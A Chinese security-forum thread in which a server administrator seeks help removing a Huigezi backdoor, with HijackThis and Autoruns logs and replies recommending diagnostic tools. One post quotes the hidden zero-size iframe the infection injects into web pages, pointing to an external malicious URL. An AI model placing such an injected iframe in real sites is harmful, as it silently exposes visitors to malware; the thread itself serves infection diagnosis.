瑞星卡卡安全论坛

我的服务器上中了灰鸽子啦，在别的机器上浏览这个服务器的网页时，在状态栏里出现了一个正在连接到http://web.163.sh.cn/~26360185/afu.htm的网页，以前我问过关于这个病毒的问题（大概在05年的11月中旬），按照某位斑竹（我忘记是那一位了）的提示，查到了对方的ip，然后在防火墙上阻止了这个ip段，但是今天发现她穿过了防火墙，又进来了！
我的扫描日志如下：
HijackThis_815汉化版扫描日志 V1.99.1
保存于      8:04:29, 日期 2005-11-16
操作系统：  Windows 2000 SP4 (WinNT 5.00.2195)
浏览器：    Internet Explorer v6.00 SP1 (6.00.2800.1106)

当前运行的进程：         
C:\WINNT\System32\smss.exe
C:\WINNT\system32\winlogon.exe
C:\WINNT\system32\services.exe
C:\WINNT\system32\lsass.exe
C:\WINNT\system32\svchost.exe
C:\WINNT\system32\spoolsv.exe
C:\Program Files\NavNT\defwatch.exe
C:\WINNT\System32\svchost.exe
C:\WINNT\System32\ibmasrex.exe
C:\WINNT\System32\IBMHPASV.EXE
C:\WINNT\System32\ibmsmbus.exe
C:\WINNT\System32\llssrv.exe
C:\Program Files\NavNT\rtvscan.exe
C:\WINNT\system32\regsvc.exe
C:\WINNT\system32\MSTask.exe
C:\Program Files\System Safety Monitor\SSMService.exe
C:\WINNT\System32\WBEM\WinMgmt.exe
C:\WINNT\system32\svchost.exe
C:\WINNT\System32\inetsrv\inetinfo.exe
C:\WINNT\System32\msdtc.exe
C:\WINNT\system32\Dfssvc.exe
C:\Program Files\System Safety Monitor\sysSafe.exe
C:\WINNT\Explorer.EXE
C:\WINNT\system32\Atiptaxx.exe
C:\Program Files\NavNT\vptray.exe
C:\WINNT\system32\internat.exe
C:\WINNT\System32\svchost.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\WINNT\System32\mdm.exe
C:\Program Files\Internet Explorer\IEXPLORE.EXE
C:\Documents and Settings\Administrator\桌面\HijackThis1991zww.exe

O4 - 启动项HKLM\\Run: [AtiPTA] Atiptaxx.exe
O4 - 启动项HKLM\\Run: [vptray] C:\Program Files\NavNT\vptray.exe
O4 - 启动项HKLM\\Run: [MS-4011 Memory Patch] C:\Documents and Settings\Administrator\桌面\RavSasser.exe -Patch
O4 - HKCU\..\Run: [Internat.exe] internat.exe
O17 - HKLM\System\CCS\Services\Tcpip\..\{24BA6A74-0200-4D4F-925A-66EE4B8E8833}: NameServer = 218.58.74.240,218.56.57.58
O17 - HKLM\System\CS1\Services\Tcpip\..\{24BA6A74-0200-4D4F-925A-66EE4B8E8833}: NameServer = 218.58.74.240,218.56.57.58
O17 - HKLM\System\CS2\Services\Tcpip\..\{24BA6A74-0200-4D4F-925A-66EE4B8E8833}: NameServer = 218.58.74.240,218.56.57.58
O20 - Winlogon Notify: NavLogon - C:\WINNT\system32\NavLogon.dll
O20 - Winlogon Notify: System Safety Monitor - C:\WINNT\SYSTEM32\SSMWinlogonEx.dll
O23 - NT 服务: DefWatch - Symantec Corporation - C:\Program Files\NavNT\defwatch.exe
O23 - NT 服务: Logical Disk Manager Administrative Service (dmadmin) - VERITAS Software Corp. - C:\WINNT\System32\dmadmin.exe
O23 - NT 服务: IBM Automatic Server Restart Executable (ibmasrex) - Unknown owner - C:\WINNT\System32\ibmasrex.exe
O23 - NT 服务: IBM Active PCI Alert Service (IBMHPS) - IBM Corporation - C:\WINNT\System32\IBMHPASV.EXE
O23 - NT 服务: SMBus Upgrade Service for Windows 2000 and above (ibmsmbus) - International Business Machines Corp. - C:\WINNT\System32\ibmsmbus.exe
O23 - NT 服务: Norton AntiVirus 客户端 (Norton AntiVirus Server) - Symantec Corporation - C:\Program Files\NavNT\rtvscan.exe
O23 - NT 服务: System Safety Monitor (SSM) - System Safety - C:\Program Files\System Safety Monitor\SSMService.exe

上面是我的服务器上的扫描日志，那位好心人帮忙看看如何解决，很让人着急啊，谢谢了！！！

那位高手帮忙看看啊，我在线等阿

我的问题和他一样，好象是装了街头篮球的人都有这情况，汗~~~请老大也帮我看下我的日志吧，谢谢~~~
HijackThis_zww汉化版扫描日志 V1.99.1
保存于      16:18:16, 日期 2006-1-19
操作系统：  Windows XP SP2 (WinNT 5.01.2600)
浏览器：    Internet Explorer v6.00 SP2 (6.00.2900.2180)

当前运行的进程：         
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
f:\Program Files\Rising\Rav\CCenter.exe
C:\WINDOWS\System32\svchost.exe
f:\Program Files\Rising\Rav\Ravmond.exe
f:\program files\rising\rfw\rfwproxy.exe
C:\WINDOWS\Explorer.EXE
f:\program files\rising\rfw\rfwsrv.exe
f:\Program Files\Rising\Rav\RavStub.exe
C:\WINDOWS\system32\spoolsv.exe
f:\program files\rising\rfw\RfwMain.exe
C:\WINDOWS\system32\nvsvc32.exe
F:\Program Files\Rising\Rav\RavTask.exe
F:\Program Files\Rising\Rav\Ravmon.exe
C:\WINDOWS\system32\RUNDLL32.EXE
C:\WINDOWS\system32\ctfmon.exe
C:\WINDOWS\system32\wscntfy.exe
C:\Program Files\Internet Explorer\iexplore.exe
f:\Program Files\Thunder Network\Thunder\Thunder.exe
G:\TDdownload\2535952005811174944\HijackThis1991zww.exe

O2 - BHO: ThunderIEHelper - {0005A87D-D626-4B3A-84F9-1D9571695F55} - C:\WINDOWS\system32\xunleibho_v11.dll
O4 - 启动项HKLM\\Run: [IMJPMIG8.1] "C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE" /Spoil /RemAdvDef /Migration32
O4 - 启动项HKLM\\Run: [PHIME2002ASync] C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE /SYNC
O4 - 启动项HKLM\\Run: [PHIME2002A] C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE /IMEName
O4 - 启动项HKLM\\Run: [RfwMain] "f:\Program Files\Rising\Rfw\rfwmain.exe" -Startup
O4 - 启动项HKLM\\Run: [RavTask] "f:\Program Files\Rising\Rav\RavTask.exe" -system
O4 - 启动项HKLM\\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
O4 - 启动项HKLM\\Run: [nwiz] nwiz.exe /install
O4 - 启动项HKLM\\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\system32\NvMcTray.dll,NvTaskbarInit
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O8 - IE右键菜单中的新增项目: &使用迅雷下载 - f:\Program Files\Thunder Network\Thunder\geturl.htm
O8 - IE右键菜单中的新增项目: &使用迅雷下载全部链接 - f:\Program Files\Thunder Network\Thunder\getallurl.htm
O9 - 浏览器额外的按钮: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - 浏览器额外的“工具”菜单项: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O17 - HKLM\System\CCS\Services\Tcpip\..\{433377B8-4B33-4DA2-AE5A-4EFE346C11C9}: NameServer = 218.30.19.40 61.134.1.4
O17 - HKLM\System\CS1\Services\Tcpip\..\{433377B8-4B33-4DA2-AE5A-4EFE346C11C9}: NameServer = 218.30.19.40 61.134.1.4
O23 - NT 服务: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe
O23 - NT 服务: Rising Proxy  Service (RfwProxySrv) - Beijing Rising Technology Co., Ltd. - f:\program files\rising\rfw\rfwproxy.exe
O23 - NT 服务: Rising Personal Firewall Service (RfwService) - Beijing Rising Technology Co., Ltd. - f:\program files\rising\rfw\rfwsrv.exe
O23 - NT 服务: Rising Process Communication Center (RsCCenter) - Beijing Rising Technology Co., Ltd. - f:\Program Files\Rising\Rav\CCenter.exe
O23 - NT 服务: RsRavMon Service (RsRavMon) - Beijing Rising Technology Co., Ltd. - f:\Program Files\Rising\Rav\Ravmond.exe

病毒所在路径是什么

不知道啊，没有路径，要是知道我就把它给删除了啊，谢谢你！

他会在网页的源文件里写入一个这样的东西<iframe src="http://web.163.sh.cn/~26360185/afu.htm" name="zhu" width="0" height="0" frameborder="0">，并且<iframe src="http://web.163.sh.cn/这个后面的每次可能都不一样，我估计是通过远程控制写进来的

高手们，求求你们了，帮帮忙阿

可能被隐藏了..你用 SREng  扫个日志 让  baohe  和  不言放弃看下...看那个我眼花

这个是什么，能告诉我在哪里能下好吗？

没人帮忙吗？好可怜哦，好心酸哦！55555555555555~~~~~~~~~~~~~~~

用Autoruns保存一个日志发上来
日志保存方法:选择File->Save菜单项
保存日志时注意选择Options->Hide Microsoft Entries菜单项(设置了这项后点工具栏的刷新按钮)

工具的下载、使用参考http://forum.ikaka.com/topic.asp?board=28&artid=7318038

非常感谢，下面就是日志，我看不明白，麻烦您帮我看看，谢谢了
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

+ AtiPTAATI Desktop Control PanelATI Technologies, Inc.c:\winnt\system32\atiptaxx.exe

+ vptrayNorton AntiVirusSymantec Corporationc:\program files\navnt\vptray.exe

HKLM\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved

+ Display Panning CPL ExtensionFile not found: deskpan.dll

+ HyperTerminal Icon ExtHyperTerminal Applet LibraryHilgraeve, Inc.c:\winnt\system32\hticons.dll

+ LDVP Shell ExtensionsNorton AntiVirusSymantec Corporationc:\program files\common files\symantec shared\ssc\vpshell2.dll

+ WinRAR shell extensionc:\program files\winrar\rarext.dll

HKLM\System\CurrentControlSet\Services

+ DefWatchVirus Definition DaemonSymantec Corporationc:\program files\navnt\defwatch.exe

+ ibmasrexIBMc:\winnt\system32\ibmasrex.exe

+ IBMHPSIBM Active PCI Alert ServiceIBM Corporationc:\winnt\system32\ibmhpasv.exe

+ ibmsmbusSMBus Upgrade Service for Windows 2000 and aboveInternational Business Machines Corp.c:\winnt\system32\ibmsmbus.exe

+ Norton AntiVirus ServerNorton AntiVirusSymantec Corporationc:\program files\navnt\rtvscan.exe

HKLM\System\CurrentControlSet\Services

+ ati2mpadATI2MPAD Miniport DriverATI Technologies Inc.c:\winnt\system32\drivers\ati2mpad.sys

+ atirage3ATIRAGE3 Miniport DriverATI Technologies Inc.c:\winnt\system32\drivers\atimpab.sys

+ b57w2kBroadcom NetXtreme Gigabit Ethernet NDIS5 Driver.Broadcom Corporationc:\winnt\system32\drivers\b57w2k.sys

+ dmioNT Disk Manager I/O DriverVERITAS Software Corp.c:\winnt\system32\drivers\dmio.sys

+ dmloadNT Disk Manager Startup DriverVERITAS Software Corp.c:\winnt\system32\drivers\dmload.sys

+ GENERICSMBSMBus Generic Device driver for Windows 9x/2K?International Business Machines Corp.c:\winnt\system32\drivers\smbgen.sys

+ IBMHPAIBM Active PCI Alert DriverIBM Corporationc:\winnt\system32\drivers\ibmhpa.sys

+ IBMHPFIBM Active PCI Filter DriverIBM Corporationc:\winnt\system32\drivers\ibmhpf.sys

+ NAVAPc:\program files\navnt\navap.sys

+ NAVAPELc:\program files\navnt\navapel.sys

+ nfrd960IBM ServeRAID Controller DriverIBM Corporationc:\winnt\system32\drivers\nfrd960.sys

+ PtilinkDirect Parallel Link DriverParallel Technologies, Inc.c:\winnt\system32\drivers\ptilink.sys

+ safemonSystem Safety Monitor 2.0 extension for Windows security layerSystem Safety Limitedc:\winnt\system32\drivers\safemon.sys

+ SMBusDHSMB Device Hub Controller driver for Windows 9x/2K?International Business Machines Corp.c:\winnt\system32\drivers\smbusdh.sys

+ SMBusHCSMB Host Controller driver for Windows 9x/2K?International Business Machines Corp.c:\winnt\system32\drivers\smbushc.sys

+ SymEventSymantec Event LibrarySymantec Corporationc:\program files\symantec\symevent.sys

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify

+ NavLogonc:\winnt\system32\navlogon.dll

+ System Safety MonitorSystem Safety Winlogon NotificationSystem Safety Limitedc:\winnt\system32\ssmwinlogonex.dll

好像看不出与你发的问题得启动项


+ ibmasrexIBMc:\winnt\system32\ibmasrex.exe
确定一下这个是不是IBM得，若不是
删除启动项
重启
删除它